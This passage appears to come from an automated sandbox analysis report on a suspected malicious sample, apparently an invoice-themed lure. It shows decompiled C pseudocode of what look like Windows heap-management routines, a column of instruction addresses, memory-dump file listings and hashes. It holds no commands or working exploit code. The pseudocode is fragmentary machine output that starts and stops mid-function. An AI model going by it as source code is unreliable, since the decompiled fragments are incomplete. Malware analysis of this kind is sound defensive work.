																		__eflags = _t387 - _v24;
																		if(_t387 < _v24) {
																			goto L36;
																		} else {
																			_v40 = _t387 - _v24;
																			_t387 =  *_t501;
																			__eflags = _v40 -  *((intOrPtr*)(_t387 + 0x14));
																			if(_v40 <  *((intOrPtr*)(_t387 + 0x14))) {
																				goto L25;
																			} else {
																				goto L36;
																			}
																		}
																	}
																	goto L146;
																} else {
																	L25:
																	_t509 =  &(_t486[7]);
																	 *_t451 = _t267;
																	if(( *_t509 & 0x00000002) == 0) {
																		_t305 = E017B8D76(_v28, _t486);
																		__eflags = _t305;
																		if(_t305 != 0) {
																			while(1) {
																				_t467 =  *_t509;
																				__eflags = _t467;
																				if(_t467 == 0) {
																					goto L26;
																				}
																				__eflags = _t467 & 0x00000002;
																				if((_t467 & 0x00000002) != 0) {
																					goto L26;
																				} else {
																					asm("lock cmpxchg [esi], ecx");
																					__eflags = _t467 - _t467;
																					if(_t467 != _t467) {
																						continue;
																					} else {
																						_t409 =  *_t486;
																						_t468 = 0;
																						__eflags = 0;
																						_v24 = _t409;
																						_v28 = 0;
																						do {
																							_t469 =  *(_t409 + ((( *(_t409 + 0x5e) & 0x0000ffff) + _t468 & 0x0000000f) + 2) * 4);
																							__eflags = _t469;
																							if(_t469 == 0) {
																								asm("lock cmpxchg [esi], ecx");
																								__eflags = 0;
																								if(0 == 0) {
																									goto L26;
																								} else {
																									goto L72;
																								}
																							} else {
																								_t308 =  *(_t469 + 0x1c);
																								__eflags = _t308 & 0x00000001;
																								if((_t308 & 0x00000001) == 0) {
																									asm("lock cmpxchg [esi], ecx");
																									__eflags = _t469 - _t469;
																									if(_t469 != _t469) {
																										L72:
																										_t409 = _v24;
																										goto L69;
																									} else {
																										_t142 = _t469 + 0x1c; // 0x1c
																										_t314 =  *_t142;
																										do {
																											__eflags = _t314 & 0xfffffffd;
																											asm("lock cmpxchg [esi], ecx");
																										} while ((_t314 & 0xfffffffd) != 0);
																										__eflags = _t314 - 2;
																										if(_t314 == 2) {
																											 *_t469 = 0;
																											E017B0010( *( *_t469), _t469 + 0x20);
																										}
																										goto L26;
																									}
																								} else {
																									goto L69;
																								}
																							}
																							goto L146;
																							L69:
																							_t468 = _v28 + 1;
																							_v28 = _t468;
																							__eflags = _t468 - 0x10;
																						} while (_t468 < 0x10);
																						E017B0010( *((intOrPtr*)( *((intOrPtr*)( *( *_t486) + 0xc)) + 0x3c0 + (( *_t486)[0x17] & 0x0000ffff) * 4)) + 0x48,  &(_t486[8]));
																						goto L26;
																					}
																				}
																				goto L146;
																			}
																		}
																	}
																}
															}
															L26:
															_t495 = _a4;
															goto L27;
															L84:
															_t260 = _v32 + 1;
															_v32 = _t260;
															__eflags = _t260 - _t375;
														} while (_t260 <= _t375);
														_t498 = _t498 | 0xffffffff;
														_v28 = _t498;
														goto L22;
													}
												}
											}
											L27:
											_t483 = 1;
											L28:
											if(E017B7D30(_t495) != 0) {
												__eflags = _a8 & 0x10000000;
												if((_a8 & 0x10000000) == 0) {
													L01850C65(_t495, _t340);
												}
											}
										}
									}
								}
							}
						}
					}
					return _t483;
				}
				L146:
			}



























































































                                                          0x017b77f8
                                                          0x017b77fc
                                                          0x017b77ff
                                                          0x017b7807
                                                          0x017b7a01
                                                          0x017b780d
                                                          0x017b780d
                                                          0x017b7812
                                                          0x017ff9c9
                                                          0x017ff9d4
                                                          0x017ff9d4
                                                          0x017b781f
                                                          0x017ff9de
                                                          0x017ff9ea
                                                          0x017b7825
                                                          0x017b782c
                                                          0x017ff9fd
                                                          0x017b7832
                                                          0x017b7832
                                                          0x017b783b
                                                          0x017ffcfe
                                                          0x00000000
                                                          0x017b7841
                                                          0x017b7845
                                                          0x017ffa0d
                                                          0x017b784b
                                                          0x017b784e
                                                          0x017ffa2f
                                                          0x017ffa30
                                                          0x017ffa32
                                                          0x017ffa34
                                                          0x00000000
                                                          0x017b7854
                                                          0x017b7858
                                                          0x017b7858
                                                          0x017b785b
                                                          0x017ffa14
                                                          0x017ffa1b
                                                          0x017ffa1b
                                                          0x017b7865
                                                          0x017ffa22
                                                          0x017ffa23
                                                          0x017ffa25
                                                          0x017ffa27
                                                          0x017ffa3a
                                                          0x017ffa3c
                                                          0x017ffa41
                                                          0x017ffa41
                                                          0x017b7865
                                                          0x017b784e
                                                          0x017b786d
                                                          0x017ffa48
                                                          0x017ffa5a
                                                          0x017ffa69
                                                          0x017ffa6c
                                                          0x017b7873
                                                          0x017b7877
                                                          0x017b787a
                                                          0x017ffa73
                                                          0x017ffa77
                                                          0x017ffa8f
                                                          0x017ffa93
                                                          0x00000000
                                                          0x017ffa95
                                                          0x017ffa9a
                                                          0x017ffaa8
                                                          0x017ffaad
                                                          0x017ffaaf
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017ffaaf
                                                          0x017ffa79
                                                          0x017ffa7b
                                                          0x017ffa7d
                                                          0x017ffa82
                                                          0x017ffa86
                                                          0x017ffa88
                                                          0x017ffab5
                                                          0x017ffab5
                                                          0x017ffab9
                                                          0x017ffae2
                                                          0x017ffae6
                                                          0x017ffaf7
                                                          0x017ffae8
                                                          0x017ffae8
                                                          0x017ffaea
                                                          0x017ffaed
                                                          0x017ffaef
                                                          0x017ffaef
                                                          0x017ffaef
                                                          0x017ffaf2
                                                          0x017ffaf2
                                                          0x017ffabb
                                                          0x017ffac8
                                                          0x017ffaca
                                                          0x017ffacd
                                                          0x017ffad8
                                                          0x017ffad8
                                                          0x017ffada
                                                          0x017ffacf
                                                          0x017ffacf
                                                          0x017ffacf
                                                          0x017ffadc
                                                          0x017ffadc
                                                          0x017ffafa
                                                          0x017ffb01
                                                          0x017ffb04
                                                          0x017ffb2a
                                                          0x017ffb06
                                                          0x017ffb06
                                                          0x017ffb0a
                                                          0x017ffb1b
                                                          0x017ffb0c
                                                          0x017ffb0c
                                                          0x017ffb0e
                                                          0x017ffb11
                                                          0x017ffb13
                                                          0x017ffb13
                                                          0x017ffb13
                                                          0x017ffb16
                                                          0x017ffb16
                                                          0x017ffb1e
                                                          0x017ffb26
                                                          0x017ffb26
                                                          0x017ffb34
                                                          0x017ffb36
                                                          0x00000000
                                                          0x017ffb38
                                                          0x017ffb38
                                                          0x017ffb38
                                                          0x00000000
                                                          0x017ffb38
                                                          0x017ffa8a
                                                          0x017ffb3d
                                                          0x017ffb3d
                                                          0x017ffb49
                                                          0x017ffb4e
                                                          0x017ffb53
                                                          0x00000000
                                                          0x017ffb59
                                                          0x017ffb59
                                                          0x017ffb59
                                                          0x017ffb5c
                                                          0x017ffb5c
                                                          0x017ffb5f
                                                          0x017ffb63
                                                          0x017ffb66
                                                          0x017ffb6b
                                                          0x00000000
                                                          0x017ffb71
                                                          0x017ffb71
                                                          0x017ffb75
                                                          0x017ffb85
                                                          0x017ffb85
                                                          0x017ffb77
                                                          0x017ffb77
                                                          0x017ffb80
                                                          0x017ffb80
                                                          0x017ffb91
                                                          0x017ffb96
                                                          0x017ffb98
                                                          0x00000000
                                                          0x017ffb9e
                                                          0x017ffb9e
                                                          0x00000000
                                                          0x017ffb9e
                                                          0x017ffb98
                                                          0x017ffb6b
                                                          0x017ffb53
                                                          0x017ffa88
                                                          0x017b7880
                                                          0x017b7880
                                                          0x017b7884
                                                          0x017b7a04
                                                          0x017b7a0d
                                                          0x017b7a12
                                                          0x017b7a15
                                                          0x017b7a17
                                                          0x00000000
                                                          0x00000000
                                                          0x017b7a19
                                                          0x017b788a
                                                          0x017b7897
                                                          0x017b789c
                                                          0x017ffce7
                                                          0x017ffce7
                                                          0x017ffcf4
                                                          0x017b78a2
                                                          0x017b78a9
                                                          0x017b78ab
                                                          0x017b78b1
                                                          0x00000000
                                                          0x017b78b7
                                                          0x017b78b7
                                                          0x017b78ba
                                                          0x017b78be
                                                          0x017b78c4
                                                          0x017b78cd
                                                          0x017b78d5
                                                          0x017b78de
                                                          0x017b78eb
                                                          0x017b78fc
                                                          0x017b7904
                                                          0x017ffbaa
                                                          0x017ffbb8
                                                          0x017b790a
                                                          0x017b7911
                                                          0x017ffbcb
                                                          0x017b7917
                                                          0x017b7917
                                                          0x017b7917
                                                          0x017b791f
                                                          0x017ffbd5
                                                          0x017ffbdb
                                                          0x017ffbe2
                                                          0x017ffbec
                                                          0x017ffbf4
                                                          0x017ffbf4
                                                          0x017ffbe2
                                                          0x017b792d
                                                          0x017b7932
                                                          0x017b7936
                                                          0x017ffbfe
                                                          0x017ffc00
                                                          0x017ffc00
                                                          0x017b7940
                                                          0x017b7948
                                                          0x017b7950
                                                          0x017b7950
                                                          0x017b7957
                                                          0x017b7960
                                                          0x00000000
                                                          0x017b7966
                                                          0x017b7970
                                                          0x017b7976
                                                          0x017b7d0d
                                                          0x00000000
                                                          0x017b7d0d
                                                          0x017b7976
                                                          0x017b797c
                                                          0x017b797c
                                                          0x017b7983
                                                          0x017ffc19
                                                          0x017ffc1f
                                                          0x017b7989
                                                          0x017b798d
                                                          0x017b7998
                                                          0x017b79a0
                                                          0x017ffc31
                                                          0x017ffc33
                                                          0x017ffc35
                                                          0x017ffc3b
                                                          0x017ffc3b
                                                          0x017ffc3d
                                                          0x017ffc3d
                                                          0x017ffc40
                                                          0x017ffc44
                                                          0x017ffc4c
                                                          0x017ffc4f
                                                          0x017ffc53
                                                          0x017ffc53
                                                          0x017ffc57
                                                          0x017ffc5b
                                                          0x017ffc5f
                                                          0x017ffc5f
                                                          0x017ffc63
                                                          0x017ffc63
                                                          0x017b79b7
                                                          0x017b79b9
                                                          0x017b79bb
                                                          0x017b79c3
                                                          0x017b7a20
                                                          0x017b7a27
                                                          0x017b7a2b
                                                          0x017b7a2e
                                                          0x017b7a31
                                                          0x017b7a54
                                                          0x017b7a54
                                                          0x017b7a58
                                                          0x017b7a5c
                                                          0x017b7a5f
                                                          0x017b7a5f
                                                          0x017b7a61
                                                          0x017b7a63
                                                          0x017b7a69
                                                          0x017b7a69
                                                          0x017b7a71
                                                          0x017b7a73
                                                          0x017b7a75
                                                          0x017b7a77
                                                          0x017b7a77
                                                          0x017b7a7d
                                                          0x017b7a80
                                                          0x017ffc6d
                                                          0x017ffc6f
                                                          0x00000000
                                                          0x017b7a86
                                                          0x017b7a86
                                                          0x017b7a8c
                                                          0x017b7a91
                                                          0x017b7a93
                                                          0x017b7aa0
                                                          0x017b7aa0
                                                          0x017b7aa2
                                                          0x017b7aa4
                                                          0x00000000
                                                          0x00000000
                                                          0x017b7aaa
                                                          0x017b7aad
                                                          0x017b7ab7
                                                          0x017b7aba
                                                          0x017b7abe
                                                          0x017b7ac0
                                                          0x00000000
                                                          0x017b7ac2
                                                          0x017b7ac2
                                                          0x017b7ac4
                                                          0x017b7ac4
                                                          0x017b7ac6
                                                          0x017b7aca
                                                          0x017b7ad0
                                                          0x017b7adc
                                                          0x017b7ae2
                                                          0x017b7ae4
                                                          0x017b7cb7
                                                          0x017b7cbb
                                                          0x017b7cbf
                                                          0x017b7cc1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017b7aea
                                                          0x017b7aea
                                                          0x017b7aed
                                                          0x017b7aef
                                                          0x00000000
                                                          0x017b7af5
                                                          0x017b7af9
                                                          0x017b7afd
                                                          0x017b7aff
                                                          0x017b7cc7
                                                          0x017b7cc7
                                                          0x00000000
                                                          0x017b7b05
                                                          0x017b7b0a
                                                          0x017b7b0d
                                                          0x017b7b0f
                                                          0x017b7b11
                                                          0x017b7b11
                                                          0x017b7b13
                                                          0x017b7b13
                                                          0x017b7b19
                                                          0x017b7b1c
                                                          0x017b7b20
                                                          0x017b7b22
                                                          0x017b7b28
                                                          0x017b7b28
                                                          0x017b7b2b
                                                          0x017b7b2b
                                                          0x017b7b2b
                                                          0x017b7b1c
                                                          0x017b7aff
                                                          0x017b7aef
                                                          0x00000000
                                                          0x017b7c88
                                                          0x017b7c8c
                                                          0x017b7c8d
                                                          0x017b7c91
                                                          0x017b7c91
                                                          0x017b7c9a
                                                          0x017b7cac
                                                          0x017b7cac
                                                          0x017b7caf
                                                          0x017b7caf
                                                          0x017b7caf
                                                          0x00000000
                                                          0x017b7caf
                                                          0x017b7ac0
                                                          0x00000000
                                                          0x017b7aad
                                                          0x017b7aa0
                                                          0x017b7a93
                                                          0x017b7a80
                                                          0x017b7b30
                                                          0x017b7b30
                                                          0x017b7b38
                                                          0x017b7b3c
                                                          0x017b7b3f
                                                          0x017b7b43
                                                          0x017ffc89
                                                          0x017ffc8d
                                                          0x017ffca5
                                                          0x017ffca6
                                                          0x017ffca9
                                                          0x017ffcad
                                                          0x017ffcae
                                                          0x017ffcb1
                                                          0x017ffcb6
                                                          0x017ffcb9
                                                          0x017ffcbe
                                                          0x017ffcc3
                                                          0x017ffcc4
                                                          0x017ffcc6
                                                          0x017ffcc6
                                                          0x017b7b4f
                                                          0x017b7b59
                                                          0x017b7b5e
                                                          0x017b7b64
                                                          0x017b7b6a
                                                          0x017b7b6a
                                                          0x017b7b6d
                                                          0x017b7b71
                                                          0x017b7b71
                                                          0x017b7b75
                                                          0x017b7b75
                                                          0x017b7b75
                                                          0x017b7b75
                                                          0x017b7b77
                                                          0x017b7b7c
                                                          0x017b7b8a
                                                          0x017b7b92
                                                          0x017b7b94
                                                          0x017b7b94
                                                          0x017b7b9a
                                                          0x017b7b9a
                                                          0x017b7ba0
                                                          0x017b7ba8
                                                          0x017b7baf
                                                          0x017b7bb3
                                                          0x017b7bc2
                                                          0x017b7bc4
                                                          0x017b7bc6
                                                          0x017b7bc8
                                                          0x017b7bc8
                                                          0x017b7bce
                                                          0x017b7bd1
                                                          0x017ffcd7
                                                          0x017ffcdd
                                                          0x017ffcdd
                                                          0x017b7bd7
                                                          0x00000000
                                                          0x017b7a33
                                                          0x017b7a33
                                                          0x017b7a37
                                                          0x017b7a3b
                                                          0x00000000
                                                          0x017b7a3d
                                                          0x017b7a41
                                                          0x017b7a45
                                                          0x017b7a4b
                                                          0x017b7a4e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017b7a4e
                                                          0x017b7a3b
                                                          0x00000000
                                                          0x017b79c5
                                                          0x017b79c5
                                                          0x017b79c5
                                                          0x017b79c8
                                                          0x017b79ce
                                                          0x017b7be6
                                                          0x017b7beb
                                                          0x017b7bed
                                                          0x017b7bf3
                                                          0x017b7bf3
                                                          0x017b7bf5
                                                          0x017b7bf7
                                                          0x00000000
                                                          0x00000000
                                                          0x017b7bfd
                                                          0x017b7c00
                                                          0x00000000
                                                          0x017b7c06
                                                          0x017b7c0d
                                                          0x017b7c11
                                                          0x017b7c13
                                                          0x00000000
                                                          0x017b7c15
                                                          0x017b7c15
                                                          0x017b7c17
                                                          0x017b7c17
                                                          0x017b7c19
                                                          0x017b7c1d
                                                          0x017b7c21
                                                          0x017b7c2d
                                                          0x017b7c33
                                                          0x017b7c35
                                                          0x017b7c76
                                                          0x017b7c7a
                                                          0x017b7c7c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017b7c37
                                                          0x017b7c37
                                                          0x017b7c3a
                                                          0x017b7c3c
                                                          0x017b7cd1
                                                          0x017b7cd5
                                                          0x017b7cd7
                                                          0x017b7c82
                                                          0x017b7c82
                                                          0x00000000
                                                          0x017b7cd9
                                                          0x017b7cde
                                                          0x017b7ce1
                                                          0x017b7ce3
                                                          0x017b7ce5
                                                          0x017b7ce7
                                                          0x017b7ce7
                                                          0x017b7ced
                                                          0x017b7cf0
                                                          0x017b7cfa
                                                          0x017b7d03
                                                          0x017b7d03
                                                          0x00000000
                                                          0x017b7cf0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017b7c3c
                                                          0x00000000
                                                          0x017b7c42
                                                          0x017b7c46
                                                          0x017b7c47
                                                          0x017b7c4b
                                                          0x017b7c4b
                                                          0x017b7c68
                                                          0x00000000
                                                          0x017b7c68
                                                          0x017b7c13
                                                          0x00000000
                                                          0x017b7c00
                                                          0x017b7bf3
                                                          0x017b7bed
                                                          0x017b79ce
                                                          0x017b79c3
                                                          0x017b79d4
                                                          0x017b79d4
                                                          0x00000000
                                                          0x017b7d11
                                                          0x017b7d15
                                                          0x017b7d16
                                                          0x017b7d1a
                                                          0x017b7d1a
                                                          0x017ffc09
                                                          0x017ffc0c
                                                          0x00000000
                                                          0x017ffc0c
                                                          0x017b7904
                                                          0x017b78b1
                                                          0x017b79d7
                                                          0x017b79d7
                                                          0x017b79dc
                                                          0x017b79e5
                                                          0x017ffd06
                                                          0x017ffd0d
                                                          0x017ffd17
                                                          0x017ffd17
                                                          0x017ffd0d
                                                          0x017b79e5
                                                          0x017b7884
                                                          0x017b787a
                                                          0x017b786d
                                                          0x017b783b
                                                          0x017b782c
                                                          0x017b79f3
                                                          0x017b79f3
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fa0d2ad20358bd85edab07fd73fc43de41adc416e570311e37dab4d7b0986cc1
                                                          • Instruction ID: 061565e7e2a8756ae0420533ece88500afe1b6f98966b7d6d3721b1bfc741173
                                                          • Opcode Fuzzy Hash: fa0d2ad20358bd85edab07fd73fc43de41adc416e570311e37dab4d7b0986cc1
                                                          • Instruction Fuzzy Hash: 6242AD316046128FDB29CF29C490B6AF7E2FFC8314F14855DEA969B391DB30E946CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017B8E60 Relevance: .6, Instructions: 599COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 87%
                                                          			E017B8E60(signed int __ecx, signed int __edx) {
				intOrPtr _v8;
				signed int _v16;
				signed int _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				signed char _v92;
				signed char _v96;
				signed int _v100;
				char _v101;
				signed int _v108;
				signed char _v112;
				unsigned int _v116;
				signed int _v120;
				signed char _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t240;
				signed int _t242;
				intOrPtr _t245;
				signed int _t249;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				intOrPtr _t257;
				signed char _t261;
				signed int _t262;
				void* _t266;
				intOrPtr* _t270;
				signed int _t273;
				signed short _t276;
				signed short _t279;
				signed short _t280;
				signed short _t282;
				signed int _t284;
				void* _t285;
				signed short _t286;
				signed int _t288;
				void* _t289;
				signed char _t294;
				unsigned int _t295;
				signed char _t297;
				signed short _t308;
				signed int _t310;
				signed short _t311;
				signed int _t312;
				void* _t314;
				signed char _t317;
				unsigned int _t321;
				void* _t322;
				signed int _t324;
				intOrPtr _t332;
				signed int _t334;
				signed short _t339;
				signed int _t341;
				signed int _t342;
				unsigned int _t343;
				char _t353;
				unsigned int _t354;
				signed char _t355;
				signed int _t356;
				signed char _t357;
				unsigned int _t363;
				signed char _t368;
				signed char _t372;
				signed short _t385;
				signed short _t390;
				signed int _t393;
				void* _t394;
				signed char _t398;
				signed int _t403;
				signed char _t404;
				void* _t413;
				signed char _t414;
				void* _t416;
				signed int _t417;
				signed int _t418;
				unsigned int _t423;
				unsigned int _t426;
				unsigned int _t432;
				signed int _t439;
				void* _t440;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				short* _t446;
				void* _t448;
				signed char _t449;
				unsigned int _t450;
				signed int _t452;
				signed char _t453;
				void* _t454;
				void* _t459;

				_t402 = __edx;
				_t314 = _t459;
				_v8 =  *((intOrPtr*)(_t314 + 4));
				_t457 = (_t459 - 0x00000008 & 0xfffffff8) + 4;
				_v16 =  *0x188d360 ^ (_t459 - 0x00000008 & 0xfffffff8) + 0x00000004;
				_t237 =  *(_t314 + 8);
				_v112 = _t237;
				_v120 = 0;
				_v116 = 0;
				_t446 =  *((intOrPtr*)(_t314 + 0x14));
				_v136 = _t446;
				_t439 = __ecx;
				_v128 =  *((intOrPtr*)(_t314 + 0xc));
				_t317 =  *(_t314 + 0x10);
				_v132 = __ecx;
				_v124 = _t317;
				if(_t237 == 0) {
					 *( *[fs:0x18] + 0xbf4) = 0;
					 *((intOrPtr*)( *[fs:0x18] + 0x34)) = E0179CCC0(0);
					_t240 = 0;
					L17:
					_pop(_t440);
					_pop(_t448);
					return E017DB640(_t240, _t314, _v16 ^ _t457, _t402, _t440, _t448);
				}
				if( *((intOrPtr*)(__ecx + 8)) == 0xddeeddee) {
					_t242 = L01842E4E(__edx);
					_t403 =  *(__ecx + 0x28);
					_v108 = _t242;
					__eflags = _t403;
					if(_t403 != 0) {
						_t332 =  *[fs:0x18];
						__eflags = _t403 -  *((intOrPtr*)(_t332 + 0x24));
						if(_t403 ==  *((intOrPtr*)(_t332 + 0x24))) {
							_t254 = _t242 | 0x00000001;
							__eflags = _t254;
							_v108 = _t254;
						}
					}
					__eflags =  *0x1885cb8 & 0x00000002;
					_t449 = _v112;
					_t404 = _t449;
					if(( *0x1885cb8 & 0x00000002) == 0) {
						_t321 = 0;
						__eflags = 0;
					} else {
						_t321 =  *((intOrPtr*)(_t449 - 8));
						_t404 = _t404 - _t321;
					}
					_v116 = _t321;
					_t322 = _t321 + _v128;
					__eflags = _t322 - _v128;
					if(_t322 >= _v128) {
						_t324 = L0185BEF9(_t439, _v108, _t404, _t322, _v124, _v136);
						_v120 = _t324;
						__eflags = _t324;
						if(_t324 == 0) {
							goto L27;
						}
						__eflags = _t324 - 0xffffffff;
						if(_t324 == 0xffffffff) {
							goto L27;
						} else {
							__eflags =  *0x1885cb8 & 0x00000002;
							_t402 = _v116;
							if(( *0x1885cb8 & 0x00000002) != 0) {
								 *(_t324 + _t402 - 8) = _t402;
								_t253 = _t324 + _t402;
								__eflags = _t402 - 8;
								if(_t402 > 8) {
									 *_t324 = _t402;
								}
								_v120 = _t253;
							}
							_t252 = _v124;
							__eflags = _t252;
							if(_t252 != 0) {
								 *_t252 =  *_t252 - _t402;
							}
							goto L30;
						}
					} else {
						_t324 = 0;
						__eflags = 0;
						L27:
						asm("sbb ecx, ecx");
						_t52 = ( ~_t324 & 0xffffffee) - 0x3fffffe9; // -1073741801
						_t402 = _t52;
						_v136 = _t402;
						_v120 = 0;
						 *( *[fs:0x18] + 0xbf4) = _t402;
						_t245 = E0179CCC0(_t402);
						__eflags = _v108;
						 *((intOrPtr*)( *[fs:0x18] + 0x34)) = _t245;
						_t439 = _v132;
						if(_v108 < 0) {
							L29:
							_v100 = _v136;
							_push( &_v100);
							_v92 = 0;
							_v84 = 1;
							_v96 = 0;
							_v80 = _v128;
							_v88 = L017EDEF0;
							L017EDEF0(_v128, _t402);
							L30:
							_t249 = E017B7D30(_t439);
							__eflags = _t249;
							_t240 = _v120;
							if(_t249 != 0) {
								__eflags = _t240;
								if(_t240 != 0) {
									L01850C65(_t439, _t449);
									_t402 = _v120;
									L018502F7(_t439, _v120);
									_t240 = _v120;
								}
							}
							goto L17;
						}
						__eflags =  *(_t439 + 0xc);
						if( *(_t439 + 0xc) >= 0) {
							goto L30;
						}
						goto L29;
					}
				}
				if(_t317 != 0) {
					 *_t317 = 0;
				}
				if(_t446 != 0) {
					 *_t446 = 0;
				}
				_t334 =  *(_t439 + 0x44);
				_t402 = _t402 | _t334;
				_v108 = _t402;
				if((_t334 & 0x01000000) != 0) {
					_push(_v128);
					_push(_t237);
					_t240 = L01853A90(_t314, _t439, _t402, _t439, _t446, __eflags);
					goto L17;
				} else {
					if(( *(_t439 + 0x48) & 0x00000001) != 0) {
						_t450 = E01791E04(_t439, _t237, _t439, _t446, __eflags);
						L49:
						_t237 = _v112;
						_t402 = _v108;
						L9:
						if(_t450 == 0) {
							_t442 = 0xc0000005;
							L146:
							 *( *[fs:0x18] + 0xbf4) = _t442;
							_t257 = E0179CCC0(_t442);
							__eflags = _v108 & 0x00000004;
							 *((intOrPtr*)( *[fs:0x18] + 0x34)) = _t257;
							if((_v108 & 0x00000004) != 0) {
								_push( &_v100);
								_v100 = _t442;
								_v92 = 0;
								_v84 = 1;
								_v96 = 0;
								_v80 = _v128;
								_v88 = L017EDEF0;
								L017EDEF0(_v128, _t402);
							}
							_t452 = 0;
							L16:
							_t240 = _t452;
							goto L17;
						}
						if( *((char*)(_t237 - 1)) == 5) {
							__eflags =  *(_t450 + 7);
							if(__eflags >= 0) {
								__eflags =  *(_t439 + 0x4c);
								if( *(_t439 + 0x4c) == 0) {
									L57:
									__eflags =  *(_t450 + 7);
									if( *(_t450 + 7) >= 0) {
										__eflags =  *(_t439 + 0x4c);
										if( *(_t439 + 0x4c) == 0) {
											_t339 =  *_t450 & 0x0000ffff;
										} else {
											_t385 =  *_t450;
											__eflags =  *(_t439 + 0x4c) & _t385;
											if(( *(_t439 + 0x4c) & _t385) != 0) {
												_t385 = _t385 ^  *(_t439 + 0x50);
												__eflags = _t385;
											}
											_t339 = _t385 & 0x0000ffff;
										}
									} else {
										_t390 = _t450 >> 0x00000003 ^  *_t450 ^ _t439 ^  *0x188874c;
										_v116 = _t390;
										__eflags = _t390 & 0x0000ffff;
										if((_t390 & 0x0000ffff) == 0) {
											_v116 = _v116 >> 0xd;
											_t393 = _t450 - _v116;
											__eflags = _t393;
											_t394 =  *_t393;
										} else {
											_t394 = 0;
										}
										_t339 =  *((intOrPtr*)(_t394 + 0x14));
									}
									__eflags =  *(_t450 + 7) - 4;
									_t341 = _t339 & 0xffff;
									_v124 = _t341;
									if( *(_t450 + 7) != 4) {
										_t342 = _t341 << 3;
										__eflags = _t342;
									} else {
										__eflags =  *(_t439 + 0x4c);
										if( *(_t439 + 0x4c) == 0) {
											_t308 =  *_t450 & 0x0000ffff;
										} else {
											_t311 =  *_t450;
											__eflags =  *(_t439 + 0x4c) & _t311;
											if(( *(_t439 + 0x4c) & _t311) != 0) {
												_t311 = _t311 ^  *(_t439 + 0x50);
												__eflags = _t311;
											}
											_t308 = _t311 & 0x0000ffff;
										}
										_t310 =  *((intOrPtr*)(_t450 - 8)) - (_t308 & 0x0000ffff);
										_v136 = _t310;
										_t342 = _t310 + _v124;
										_t237 = _v112;
									}
									_t343 = _t342 + _t450;
									__eflags = _t343 - _t237;
									if(_t343 >= _t237) {
										L80:
										_v116 =  *((intOrPtr*)(_t237 - 8));
										__eflags = _t402 & 0x3c000102;
										if((_t402 & 0x3c000102) != 0) {
											goto L11;
										}
